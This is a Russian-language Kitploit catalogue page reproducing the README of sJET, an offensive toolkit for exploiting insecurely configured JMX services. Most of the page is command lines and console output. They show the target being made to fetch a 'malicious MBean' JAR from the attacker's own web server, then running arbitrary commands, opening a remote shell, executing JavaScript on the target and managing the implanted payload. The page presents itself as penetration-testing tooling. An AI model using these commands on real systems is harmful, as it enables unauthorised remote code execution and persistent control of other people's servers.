Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
sjet — siberas набор инструментов для эксплуатации JMX | Kitploit
Инструменты/GitHubGitHub/siberas/sjet
Генерация полезной нагрузкиЭксплуатацияКомандование и УправлениеИнструмент Удаленного Доступа
GitHubsiberas/sjet

sjet

siberas набор инструментов для эксплуатации JMX

Репозиторий
133915 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

sJET от siberas

siberas JMX Exploitation Toolkit

sJET позволяет легко эксплуатировать небезопасно настроенные JMX-сервисы. Дополнительную справочную информацию можно найти здесь и здесь.

Предварительные требования

  • Jython 2.7

Использование

SJET реализует интерфейс командной строки (с использованием argparse):

root@kitploit:~
jython sjet.py targetHost targetPort password MODE (modeOptions)

Где

  • targetHost - IP-адрес цели
  • targerPort - порт цели, на котором работает JMX
  • password - пароль, который был установлен во время инсталляции
  • MODE - режим скрипта
  • modeOptions - параметры для выбранного режима

Режимы и параметры режимов

  • install - устанавливает полезную нагрузку на текущую цель
    • payload_url - полный URL для загрузки полезной нагрузки
    • payload_port - порт для загрузки полезной нагрузки
  • uninstall - удаляет полезную нагрузку с текущей цели
  • password - изменяет пароль на уже развернутой полезной нагрузке
    • password - новый пароль
  • command - выполняет команду CMD на целевой машине
    • CMD - команда для выполнения
  • shell - запускает простую оболочку на целевой машине (с ограничениями Java Runtime.exec())
  • javascript - выполняет javascript-файл FILENAME на целевой машине
    • FILENAME - javascript для выполнения

Пример

Установка MBean полезной нагрузки на уязвимый JMX-сервис

В следующем примере уязвимый JMX-сервис работает на 192.168.11.136:9991, атакующий имеет IP-адрес 192.168.11.132. JMX-сервис подключится к веб-сервису атакующего, чтобы загрузить JAR-файл полезной нагрузки. sJET запустит необходимый веб-сервис на порту 8000. После успешной установки MBean пароль по умолчанию изменяется на пароль, указанный в командной строке ("super_secret").

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret install http://192.168.11.132:8000 8000
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Starting webserver at port 8000
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  1
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.11.132:8000
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
192.168.11.136 - - [22/Aug/2017 22:38:00] "GET / HTTP/1.1" 200 -
192.168.11.136 - - [22/Aug/2017 22:38:00] "GET /siberas_mlet.jar HTTP/1.1" 200 -
[+] Successfully loaded MBeanSiberas:name=payload,id=1
[+] Changing default password...
[+] Loaded de.siberas.lab.SiberasPayload
[+] Successfully changed password

h0ng10@rocksteady:~/sjet$

Выполнение команды 'ls -la' на Linux-цели:

После установки полезной нагрузки мы можем использовать её для выполнения системных команд на цели.

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret command "ls -la"
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  2
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing command: ls -la
total 16
drwxr-xr-x  4 root    root    4096 Aug 22 16:12 .
drwxr-xr-x 66 root    root    4096 Aug 22 16:12 ..
lrwxrwxrwx  1 root    root      12 Mär 29 01:46 conf -> /etc/tomcat8
drwxr-xr-x  2 tomcat8 tomcat8 4096 Mär 29 01:46 lib
lrwxrwxrwx  1 root    root      17 Mär 29 01:46 logs -> ../../log/tomcat8
drwxrwxr-x  3 tomcat8 tomcat8 4096 Aug 22 16:12 webapps
lrwxrwxrwx  1 root    root      19 Mär 29 01:46 work -> ../../cache/tomcat8


[+] Done
h0ng10@rocksteady:~/sjet$

Запуск ping в режиме оболочки на цели

Если вы не хотите загружать Java для каждой команды, вы можете использовать "режим оболочки", чтобы получить ограниченную командную оболочку.

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret shell
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  3
[+] Use command 'exit_shell' to exit the shell
>>> ping -c 3 127.0.0.1
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing command: ping -c 3 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.075 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.046 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.044 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2050ms
rtt min/avg/max/mdev = 0.044/0.055/0.075/0.014 ms


>>> exit_shell
[+] Done
h0ng10@rocksteady:~/sjet$

Вызов JavaScript-полезной нагрузки на цели:

Пример скрипта "javaproperties.js" отображает свойства Java уязвимого сервиса. Его можно вызвать следующим образом:

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret javascript scripts/javaproperties.js
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  4
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing script
java.vendor=Oracle Corporation
sun.java.launcher=SUN_STANDARD
catalina.base=/var/lib/tomcat8
sun.management.compiler=HotSpot 64-Bit Tiered Compilers
catalina.useNaming=true
os.name=Linux
...
java.vm.name=OpenJDK 64-Bit Server VM
file.encoding=UTF-8
java.specification.version=1.8


h0ng10@rocksteady:~/sjet$

Смена пароля

Изменить существующий пароль ("super_secret") на "this-is-the-new-password":

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret password this-is-the-new-password
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  6
[+] Loaded de.siberas.lab.SiberasPayload
[+] Successfully changed password

[+] Done
h0ng10@rocksteady:~/sjet$

Удаление MBean полезной нагрузки с цели

Удалить полезную нагрузку 'Siberas' с цели:

root@kitploit:~
minmaxer@prellermbp:~/sjet$ jython sjet.py 192.168.1.101 9010 super_secret uninstall
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.1.101:9010/jmxrmi
[+] Connected: rmi://192.168.1.1  16
[+] MBean correctly uninstalled
minmaxer@prellermbp:~/sjet$

Вклад

Не стесняйтесь вносить свой вклад.

Авторы

  • Hans-Martin Münch - Первоначальная идея и работа - h0ng10
  • Patricio Reller - CLI и дополнительные параметры - preller

См. также список участников, которые приняли участие в этом проекте.

Лицензия

Этот проект лицензирован по лицензии MIT - подробности см. в файле LICENSE.

Скачать инструмент